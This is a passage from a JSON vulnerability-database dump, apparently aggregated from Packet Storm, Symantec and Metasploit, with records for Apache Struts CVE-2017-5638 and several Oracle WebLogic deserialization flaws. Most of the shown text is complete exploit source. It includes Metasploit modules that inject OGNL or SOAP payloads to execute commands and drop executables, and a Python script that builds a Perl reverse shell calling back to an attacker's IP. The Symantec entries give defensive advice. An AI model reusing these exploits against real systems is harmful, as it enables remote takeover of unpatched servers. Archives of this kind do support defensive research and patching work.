\n# \ndef exploit \nsend_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path), \n'data' => exploit_process_builder_payload, \n'ctype' => 'text/xml;charset=UTF-8' \n}, datastore['TIMEOUT']) \nend \nend \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/146143/oracle_weblogic_wsat_deserialization_rce.rb.txt"}, {"lastseen": "2017-03-15T01:15:35", "description": "", "cvss3": {}, "published": "2017-03-14T00:00:00", "type": "packetstorm", "title": "Apache Struts Jakarta Multipart Parser OGNL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-14T00:00:00", "id": "PACKETSTORM:141630", "href": "https://packetstormsecurity.com/files/141630/Apache-Struts-Jakarta-Multipart-Parser-OGNL-Injection.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::EXE \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Apache Struts Jakarta Multipart Parser OGNL Injection', \n'Description' => %q{ \nThis module exploits a remote code execution vunlerability in Apache Struts \nversion 2.3.5 - 2.3.31, and 2.5 - 2.5.10. Remote Code Execution can be performed \nvia http Content-Type header. \n \nNative payloads will be converted to executables and dropped in the \nserver's temp dir. If this fails, try a cmd/* payload, which won't \nhave to write to the disk. 
\n}, \n'Author' => [ \n'Nike.Zheng', # PoC \n'Nixawk', # Metasploit module \n'Chorder', # Metasploit module \n'egypt', # combining the above \n'Jeffrey Martin', # Java fu \n], \n'References' => [ \n['CVE', '2017-5638'], \n['URL', 'https://cwiki.apache.org/confluence/display/WW/S2-045'] \n], \n'Privileged' => true, \n'Targets' => [ \n[ \n'Universal', { \n'Platform' => %w{ unix windows linux }, \n'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ], \n}, \n], \n], \n'DisclosureDate' => 'Mar 07 2017', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOpt::RPORT(8080), \nOptString.new('TARGETURI', [ true, 'The path to a struts application action', '/struts2-showcase/' ]), \n] \n) \nregister_advanced_options( \n[ \nOptString.new('HTTPMethod', [ true, 'The HTTP method to send in the request. Cannot contain spaces', 'GET' ]) \n] \n) \n \n@data_header = \"X-#{rand_text_alpha(4)}\" \nend \n \ndef check \nvar_a = rand_text_alpha_lower(4) \n \nognl = \"\" \nognl << %q|(#os=@java.lang.System@getProperty('os.name')).| \nognl << %q|(#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('|+var_a+%q|', #os))| \n \nbegin \nresp = send_struts_request(ognl) \nrescue Msf::Exploit::Failed \nreturn Exploit::CheckCode::Unknown \nend \n \nif resp && resp.code == 200 && resp.headers[var_a] \nvprint_good(\"Victim operating system: #{resp.headers[var_a]}\") \nExploit::CheckCode::Vulnerable \nelse \nExploit::CheckCode::Safe \nend \nend \n \ndef exploit \ncase payload.arch.first \n#when ARCH_JAVA \n# datastore['LHOST'] = nil \n# resp = send_payload(payload.encoded_jar) \nwhen ARCH_CMD \nresp = execute_command(payload.encoded) \nelse \nresp = send_payload(generate_payload_exe) \nend \n \nrequire'pp' \npp resp.headers if resp \nend \n \ndef send_struts_request(ognl, extra_header: '') \nuri = normalize_uri(datastore[\"TARGETURI\"]) \ncontent_type = \"%{(#_='multipart/form-data').\" \ncontent_type << \"(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).\" \ncontent_type << 
\"(#_memberAccess?\" \ncontent_type << \"(#_memberAccess=#dm):\" \ncontent_type << \"((#container=#context['com.opensymphony.xwork2.ActionContext.container']).\" \ncontent_type << \"(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).\" \ncontent_type << \"(#ognlUtil.getExcludedPackageNames().clear()).\" \ncontent_type << \"(#ognlUtil.getExcludedClasses().clear()).\" \ncontent_type << \"(#context.setMemberAccess(#dm)))).\" \ncontent_type << ognl \ncontent_type << \"}\" \n \nheaders = { 'Content-Type' => content_type } \nif extra_header \nheaders[@data_header] = extra_header \nend \n \n#puts content_type.gsub(\").\", \").\\n\") \n#puts \n \nresp = send_request_cgi( \n'uri' => uri, \n'method' => datastore['HTTPMethod'], \n'headers' => headers \n) \n \nif resp && resp.code == 404 \nfail_with(Failure::BadConfig, 'Server returned HTTP 404, please double check TARGETURI') \nend \nresp \nend \n \ndef execute_command(cmd) \nognl = '' \nognl << %Q|(#cmd=@org.apache.struts2.ServletActionContext@getRequest().getHeader('#{@data_header}')).| \n \n# You can add headers to the server's response for debugging with this: \n#ognl << %q|(#r=#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse']).| \n#ognl << %q|(#r.addHeader('decoded',#cmd)).| \n \nognl << %q|(#os=@java.lang.System@getProperty('os.name')).| \nognl << %q|(#cmds=(#os.toLowerCase().contains('win')?{'cmd.exe','/c',#cmd}:{'/bin/sh','-c',#cmd})).| \nognl << %q|(#p=new java.lang.ProcessBuilder(#cmds)).| \nognl << %q|(#p.redirectErrorStream(true)).| \nognl << %q|(#process=#p.start())| \n \nsend_struts_request(ognl, extra_header: cmd) \nend \n \ndef send_payload(exe) \n \nognl = \"\" \nognl << %Q|(#data=@org.apache.struts2.ServletActionContext@getRequest().getHeader('#{@data_header}')).| \nognl << %Q|(#f=@java.io.File@createTempFile('#{rand_text_alpha(4)}','.exe')).| \n#ognl << %q|(#r=#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse']).| \n#ognl << 
%q|(#r.addHeader('file',#f.getAbsolutePath())).| \nognl << %q|(#f.setExecutable(true)).| \nognl << %q|(#f.deleteOnExit()).| \nognl << %q|(#fos=new java.io.FileOutputStream(#f)).| \n \n# Using stuff from the sun.* package here means it likely won't work on \n# non-Oracle JVMs, but the b64 decoder in Apache Commons doesn't seem to \n# work and I don't see a better way of getting binary data onto the \n# system. =/ \nognl << %q|(#d=new sun.misc.BASE64Decoder().decodeBuffer(#data)).| \nognl << %q|(#fos.write(#d)).| \nognl << %q|(#fos.close()).| \n \nognl << %q|(#p=new java.lang.ProcessBuilder({#f.getAbsolutePath()})).| \nognl << %q|(#p.start()).| \nognl << %q|(#f.delete())| \n \nsend_struts_request(ognl, extra_header: [exe].pack(\"m\").delete(\"\\n\")) \nend \n \nend \n \n=begin \nDoesn't work: \n \nognl << %q|(#cl=new java.net.URLClassLoader(new java.net.URL[]{#f.toURI().toURL()})).| \nognl << %q|(#c=#cl.loadClass('metasploit.Payload')).| \nognl << %q|(#m=@ognl.OgnlRuntime@getMethods(#c,'main',true).get(0)).| \nognl << %q|(#r.addHeader('meth',#m.toGenericString())).| \nognl << %q|(#m.invoke(null,null)).| \n \n#ognl << %q|(#m=#c.getMethod('run',@java.lang.Class@forName('java.lang.Object'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0 \n#ognl << %q|(#m=#c.getMethod('run',@java.lang.Class@forName('java.lang.String'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0 \n#ognl << %q|(#m=#c.getMethod('run',@java.lang.Class@forName('[Ljava.lang.Object;'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0 \n#ognl << %q|(#m=#c.getMethod('run',@java.lang.Class@forName('[Ljava.lang.String;'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0 \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{})).| \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@java.lang.Class@forName('java.lang.Object')})).| \n#ognl << %q|(#m=#c.getMethod('run',new 
java.lang.Class[]{@java.lang.Class@forName('java.lang.String')})).| \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@java.lang.Class@forName('java.lang.String')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@16e2d926 \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.Object;')})).| \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@684b3dfd \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{null})).| \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{@java.lang.Class@forName('java.lang.Object')})).| \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{@java.lang.Class@forName('java.lang.String')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@16e2d926 \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{@java.lang.Class@forName('[Ljava.lang.Object;')})).| \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{@java.lang.Class@forName('[Ljava.lang.String;')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@684b3dfd \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@4b232ba9 \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{null})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@4b232ba9 \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{null})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@4fee2899 \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[])).| # parse failed \n#ognl << %q|(#m=#c.getMethod('run',null)).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@50af0cd6 \n \n#ognl << %q|(#m=#c.getMethod('main',@java.lang.Class@forName('java.lang.Object'))).| # java.lang.IllegalArgumentException: 
java.lang.ClassCastException@58ce5ef0 \n#ognl << %q|(#m=#c.getMethod('main',@java.lang.Class@forName('java.lang.String'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0 \n#ognl << %q|(#m=#c.getMethod('main',@java.lang.Class@forName('[Ljava.lang.Object;'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0 \n#ognl << %q|(#m=#c.getMethod('main',@java.lang.Class@forName('[Ljava.lang.String;'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@2231d3a9 \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{})).| \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('java.lang.Object')})).| \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('java.lang.String')})).| \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.Object;')})).| \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@684b3dfd \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{null})).| \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{@java.lang.Class@forName('java.lang.Object')})).| \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{@java.lang.Class@forName('java.lang.String')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@16e2d926 \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{@java.lang.Class@forName('[Ljava.lang.Object;')})).| \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{@java.lang.Class@forName('[Ljava.lang.String;')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@16e2d926 \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@5f78809f \n#ognl << %q|(#m=#c.getMethod('main',new 
java.lang.Object[]{null})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@4b232ba9 \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{null})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@56c6add5 \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[])).| # parse failed \n#ognl << %q|(#m=#c.getMethod('main',null)).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@1722884 \n \n=end \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/141630/struts2_content_type_ognl.rb.txt"}, {"lastseen": "2017-03-12T01:15:38", "description": "", "cvss3": {}, "published": "2017-03-10T00:00:00", "type": "packetstorm", "title": "Apache Struts 2 2.3.x / 2.5.x Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-10T00:00:00", "id": "PACKETSTORM:141576", "href": "https://packetstormsecurity.com/files/141576/Apache-Struts-2-2.3.x-2.5.x-Remote-Code-Execution.html", "sourceData": "`# CVE-2017-5638 \n# Apache Struts 2 Vulnerability Remote Code Execution \n# Reverse shell from target \n# Author: anarc0der - github.com/anarcoder \n# Tested with tomcat8 \n \n# Install tomcat8 \n# Deploy WAR file https://github.com/nixawk/labs/tree/master/CVE-2017-5638 \n \n# Ex: \n# Open: $ nc -lnvp 4444 \n# python2 struntsrce.py --target=http://localhost:8080/struts2_2.3.15.1-showcase/showcase.action --ip=127.0.0.1 --port=4444 \n \n\"\"\" \nUsage: \nstruntsrce.py --target=<arg> --ip=<arg> --port=<arg> \nstruntsrce.py --help \nstruntsrce.py --version \n \nOptions: \n-h --help Open help menu \n-v --version Show version \nRequired options: \n--target='url target' your target :) \n--ip='10.10.10.1' your ip \n--port=4444 open port for back connection \n \n\"\"\" \n \nimport urllib2 \nimport httplib \nimport os \nimport sys \nfrom docopt import docopt, DocoptExit \n \n \nclass CVE_2017_5638(): \n \ndef __init__(self, 
p_target, p_ip, p_port): \nself.target = p_target \nself.ip = p_ip \nself.port = p_port \nself.revshell = self.generate_revshell() \nself.payload = self.generate_payload() \nself.exploit() \n \ndef generate_revshell(self): \nrevshell = \"perl -e \\\\'use Socket;$i=\\\"{0}\\\";$p={1};\"\\ \n\"socket(S,PF_INET,SOCK_STREAM,getprotobyname(\\\"tcp\\\"));\"\\ \n\"if(connect(S,sockaddr_in($p,inet_aton($i)))){{open\"\\ \n\"(STDIN,\\\">&S\\\");open(STDOUT,\\\">&S\\\");\"\\ \n\"open(STDERR,\\\">&S\\\");exec(\\\"/bin/sh -i\\\");}};\\\\'\" \nreturn revshell.format(self.ip, self.port) \n \ndef generate_payload(self): \npayload = \"%{{(#_='multipart/form-data').\"\\ \n\"(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).\"\\ \n\"(#_memberAccess?\"\\ \n\"(#_memberAccess=#dm):\"\\ \n\"((#container=#context['com.opensymphony.xwork2.\"\\ \n\"ActionContext.container']).\"\\ \n\"(#ognlUtil=#container.getInstance(@com.opensymphony.\"\\ \n\"xwork2.ognl.OgnlUtil@class)).\"\\ \n\"(#ognlUtil.getExcludedPackageNames().clear()).\"\\ \n\"(#ognlUtil.getExcludedClasses().clear()).\"\\ \n\"(#context.setMemberAccess(#dm)))).\"\\ \n\"(#cmd='{0}').\"\\ \n\"(#iswin=(@java.lang.System@getProperty('os.name').\"\\ \n\"toLowerCase().contains('win'))).\"\\ \n\"(#cmds=(#iswin?{{'cmd.exe','/c',#cmd}}:\"\\ \n\"{{'/bin/bash','-c',#cmd}})).\"\\ \n\"(#p=new java.lang.ProcessBuilder(#cmds)).\"\\ \n\"(#p.redirectErrorStream(true)).(#process=#p.start()).\"\\ \n\"(#ros=(@org.apache.struts2.ServletActionContext@get\"\\ \n\"Response().getOutputStream())).\"\\ \n\"(@org.apache.commons.io.IOUtils@copy\"\\ \n\"(#process.getInputStream(),#ros)).(#ros.flush())}}\" \nreturn payload.format(self.revshell) \n \ndef exploit(self): \ntry: \n# Set proxy for debug request, just uncomment these lines \n# Change the proxy port \n \n#proxy = urllib2.ProxyHandler({'http': '127.0.0.1:8081'}) \n#opener = urllib2.build_opener(proxy) \n#urllib2.install_opener(opener) \n \nheaders = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64)' \n' 
AppleWebKit/537.36 (KHTML, like Gecko)' \n' Chrome/55.0.2883.87 Safari/537.36', \n'Content-Type': self.payload} \nxpl = urllib2.Request(self.target, headers=headers) \nbody = urllib2.urlopen(xpl).read() \nexcept httplib.IncompleteRead as b: \nbody = b.partial \nprint body \n \n \ndef main(): \ntry: \narguments = docopt(__doc__, version=\"Apache Strunts RCE Exploit\") \ntarget = arguments['--target'] \nip = arguments['--ip'] \nport = arguments['--port'] \nexcept DocoptExit as e: \nos.system('python struntsrce.py --help') \nsys.exit(1) \n \nCVE_2017_5638(target, ip, port) \n \n \nif __name__ == '__main__': \nmain() \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/141576/struntsrce.py.txt"}, {"lastseen": "2019-05-08T03:35:49", "description": "", "cvss3": {}, "published": "2019-05-07T00:00:00", "type": "packetstorm", "title": "Oracle Weblogic Server Deserialization Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-2725"], "modified": "2019-05-07T00:00:00", "id": "PACKETSTORM:152756", "href": "https://packetstormsecurity.com/files/152756/Oracle-Weblogic-Server-Deserialization-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Powershell \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => 'Oracle Weblogic Server Deserialization RCE - AsyncResponseService ', \n'Description' => %q{ \nAn unauthenticated attacker with network access to the Oracle Weblogic Server T3 \ninterface can send a malicious SOAP request to the interface WLS AsyncResponseService \nto execute code on the vulnerable host. 
\n}, \n'Author' => \n[ \n'Andres Rodriguez - 2Secure (@acamro) <acamro[at]gmail.com>', # Metasploit Module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n['CVE', '2019-2725'], \n['CNVD-C', '2019-48814'], \n['URL', 'http://www.cnvd.org.cn/webinfo/show/4999'], \n['URL', 'https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html'] \n], \n'Privileged' => false, \n'Platform' => %w{ unix win solaris }, \n'Targets' => \n[ \n[ 'Unix', \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_bash'} \n], \n[ 'Windows', \n'Platform' => 'win', \n'Arch' => [ARCH_X64, ARCH_X86], \n'DefaultOptions' => {'PAYLOAD' => 'windows/meterpreter/reverse_tcp'} \n], \n[ 'Solaris', \n'Platform' => 'solaris', \n'Arch' => ARCH_CMD, \n'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_perl'}, \n'Payload' => { \n'Space' => 2048, \n'DisableNops' => true, \n'Compat' => \n{ \n'PayloadType' => 'cmd', \n'RequiredCmd' => 'generic perl telnet', \n} \n} \n] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => \n{ \n'WfsDelay' => 12 \n}, \n'DisclosureDate' => 'Apr 23 2019')) \n \nregister_options( \n[ \nOpt::RPORT(7001), \nOptString.new('URIPATH', [false, 'URL to the weblogic instance (leave blank to substitute RHOSTS)', nil]), \nOptString.new('WSPATH', [true, 'URL to AsyncResponseService', '/_async/AsyncResponseService']) \n] \n) \nend \n \ndef check \nres = send_request_cgi( \n'uri' => normalize_uri(datastore['WSPATH']), \n'method' => 'POST', \n'ctype' => 'text/xml', \n'headers' => {'SOAPAction' => '' } \n) \n \nif res && res.code == 500 && res.body.include?(\"<faultcode>env:Client</faultcode>\") \nvprint_status(\"The target returned a vulnerable HTTP code: /#{res.code}\") \nvprint_status(\"The target returned a vulnerable HTTP error: /#{res.body.split(\"\\n\")[0]}\") \nExploit::CheckCode::Vulnerable \nelsif res && res.code != 202 \nvprint_status(\"The target returned a non-vulnerable HTTP code\") \nExploit::CheckCode::Safe 
\nelsif res.nil? \nvprint_status(\"The target did not respond in an expected way\") \nExploit::CheckCode::Unknown \nelse \nvprint_status(\"The target returned HTTP code: #{res.code}\") \nvprint_status(\"The target returned HTTP body: #{res.body.split(\"\\n\")[0]} [...]\") \nExploit::CheckCode::Unknown \nend \nend \n \ndef exploit \nprint_status(\"Generating payload...\") \ncase target.name \nwhen 'Windows' \nstring0_cmd = 'cmd.exe' \nstring1_param = '/c' \nshell_payload = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true, encoded: false }) \nwhen 'Unix','Solaris' \nstring0_cmd = '/bin/bash' \nstring1_param = '-c' \nshell_payload = payload.encoded \nend \n \nrandom_action = rand_text_alphanumeric(20) \nrandom_relates = rand_text_alphanumeric(20) \n \nsoap_payload = %Q|<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"| \nsoap_payload << %Q|xmlns:wsa=\"http://www.w3.org/2005/08/addressing\"| \nsoap_payload << %Q|xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\">| \nsoap_payload << %Q|<soapenv:Header>| \nsoap_payload << %Q|<wsa:Action>#{random_action}</wsa:Action>| \nsoap_payload << %Q|<wsa:RelatesTo>#{random_relates}</wsa:RelatesTo>| \nsoap_payload << %Q|<work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">| \nsoap_payload << %Q|<void class=\"java.lang.ProcessBuilder\">| \nsoap_payload << %Q|<array class=\"java.lang.String\" length=\"3\">| \nsoap_payload << %Q|<void index=\"0\">| \nsoap_payload << %Q|<string>#{string0_cmd}</string>| \nsoap_payload << %Q|</void>| \nsoap_payload << %Q|<void index=\"1\">| \nsoap_payload << %Q|<string>#{string1_param}</string>| \nsoap_payload << %Q|</void>| \nsoap_payload << %Q|<void index=\"2\">| \nsoap_payload << %Q|<string>#{shell_payload.encode(xml: :text)}</string>| \n#soap_payload << %Q|<string>#{xml_encode(shell_payload)}</string>| \nsoap_payload << %Q|</void>| \nsoap_payload << %Q|</array>| \nsoap_payload << %Q|<void method=\"start\"/>| 
\nsoap_payload << %Q|</void>| \nsoap_payload << %Q|</work:WorkContext>| \nsoap_payload << %Q|</soapenv:Header>| \nsoap_payload << %Q|<soapenv:Body>| \nsoap_payload << %Q|<asy:onAsyncDelivery/>| \nsoap_payload << %Q|</soapenv:Body>| \nsoap_payload << %Q|</soapenv:Envelope>| \n \nuri = normalize_uri(datastore['WSPATH']) \nif uri.nil? \ndatastore['URIPATH'] = \"http://#{RHOST}:#{RPORT}/\" \nend \n \nprint_status(\"Sending payload...\") \n \nbegin \nres = send_request_cgi( \n'uri' => uri, \n'method' => 'POST', \n'ctype' => 'text/xml', \n'data' => soap_payload, \n'headers' => {'SOAPAction' => '' } \n) \nrescue Errno::ENOTCONN \nfail_with(Failure::Disconnected, \"The target forcibly closed the connection, and is likely not vulnerable.\") \nend \n \nif res.nil? \nfail_with(Failure::Unreachable, \"No response from host\") \nelsif res && res.code != 202 \nfail_with(Failure::UnexpectedReply,\"Exploit failed. Host did not responded with HTTP code #{res.code} instead of HTTP code 202\") \nend \nend \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/152756/weblogic_deserialize_asyncresponseservice.rb.txt"}], "symantec": [{"lastseen": "2021-06-08T19:08:30", "description": "### Description\n\nOracle WebLogic Server is prone to a remote security vulnerability in WLS Security. The vulnerability can be exploited over the 'HTTP' protocol. This vulnerability affects the following supported versions: 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0, 12.2.1.2.0\n\n### Technologies Affected\n\n * Oracle Weblogic Server 10.3.6.0 \n * Oracle Weblogic Server 12.1.3.0 \n * Oracle Weblogic Server 12.2.1.1 \n * Oracle Weblogic Server 12.2.1.2 \n\n### Recommendations\n\n**Block external access at the network boundary, unless external parties require service.** \nFilter access to the affected computer at the network boundary if global access isn't needed. 
Restricting access to only trusted computers and networks might greatly reduce the likelihood of a successful exploit.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity including unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\n**Modify default ACL settings.** \nImplement database access control to limit the immediate impact of such vulnerabilities on the data and possibly the database itself. Ensure that applications are isolated from one another and from sensitive data through separate user accounts and restrictive ACL configurations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo limit the impact of latent vulnerabilities, configure servers and other applications to run as a nonadministrative user with minimal access rights.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "cvss3": {}, "published": "2017-10-17T00:00:00", "type": "symantec", "title": "Oracle WebLogic Server CVE-2017-10271 Remote Security Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2017-10271"], "modified": "2017-10-17T00:00:00", "id": "SMNTC-101304", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/101304", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2020-01-15T20:35:57", "description": "### Description\n\nOracle WebLogic Server is prone to a remote code-execution vulnerability. A remote attacker can leverage this issue to execute arbitrary code within the context of the affected system. Failed exploit attempts may result in a denial-of-service condition. 
Oracle WebLogic Server 10.3.6.0.0, 12.1.3.0.0, and 12.2.1.3.0 are vulnerable.\n\n### Technologies Affected\n\n * Oracle Communications Converged Application Server 5.1 \n * Oracle Communications Converged Application Server 7.0 \n * Oracle Communications Converged Application Server 7.1 \n * Oracle PeopleSoft Enterprise PeopleTools 8.56 \n * Oracle PeopleSoft Enterprise PeopleTools 8.57 \n * Oracle PeopleSoft Enterprise PeopleTools 8.58 \n * Oracle StorageTek Tape Analytics SW Tool 2.3.0 \n * Oracle Tape Library ACSLS 8.5 \n * Oracle Weblogic Server 10.3.6.0.0 \n * Oracle Weblogic Server 12.1.3.0.0 \n * Oracle Weblogic Server 12.2.1.3.0 \n\n### Recommendations\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from a successful exploit. \n\n**Do not accept or execute files from untrusted or unknown sources.** \nTo limit exposure to these and other latent vulnerabilities, never handle files that originate from unfamiliar or untrusted sources.\n\n**Do not follow links provided by unknown or untrusted sources.** \nTo reduce the likelihood of successful exploits, never visit sites of questionable integrity or follow links provided by unfamiliar or untrusted sources.\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, run applications with the minimal amount of privileges required for functionality. \n\nUpdates are available. 
Please see the references or vendor advisory for more information.\n", "cvss3": {}, "published": "2019-06-18T00:00:00", "type": "symantec", "title": "Oracle WebLogic Server Deserialization CVE-2019-2729 Remote Code Execution Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2019-2725", "CVE-2019-2729"], "modified": "2019-06-18T00:00:00", "id": "SMNTC-108822", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/108822", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2023-03-23T01:32:13", "description": "The Oracle WebLogic WLS WSAT Component is vulnerable to a XML Deserialization remote code execution vulnerability. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Discovered by Alexey Tyurin of ERPScan and Federico Dotta of Media Service. Please note that SRVHOST, SRVPORT, HTTP_DELAY, URIPATH and related HTTP Server variables are only used when executing a check and will not be used when executing the exploit itself.\n", "cvss3": {}, "published": "2018-01-05T20:05:21", "type": "metasploit", "title": "Oracle WebLogic wls-wsat Component Deserialization RCE", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-10271"], "modified": "2022-03-09T23:28:25", "id": "MSF:EXPLOIT-MULTI-HTTP-ORACLE_WEBLOGIC_WSAT_DESERIALIZATION_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/multi/http/oracle_weblogic_wsat_deserialization_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n # include Msf::Exploit::Remote::HttpServer\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Oracle WebLogic wls-wsat Component Deserialization RCE',\n 
